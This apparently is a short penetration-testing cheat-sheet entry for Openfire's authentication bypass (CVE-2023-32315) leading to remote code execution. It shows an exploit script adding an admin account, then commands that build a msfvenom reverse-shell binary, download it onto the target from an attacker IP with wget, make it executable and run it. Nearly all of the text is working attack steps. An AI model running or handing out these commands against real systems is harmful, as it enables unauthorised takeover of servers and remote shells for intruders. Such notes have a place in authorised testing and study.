OpenFire
Authentication Bypass to RCE
$ python3 CVE-2023-32315.py -t http://openfire-instance:9090
<SNIP>
User added successfully: url: http://openfire-instance:9090 username: qwkc2s password: 2vzxql# Create a revshell binary on the attacking host
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.45.170 LPORT=80 -f elf -o revshell.elf
# Download the binary on the target
wget http://192.168.45.170:443/revshell.elf -O /tmp/revshell.elf
# Assign execute permissions on the file
chmod +x /tmp/revshell.elf
# Execute the malicious binary
/tmp/revshell.elfLast updated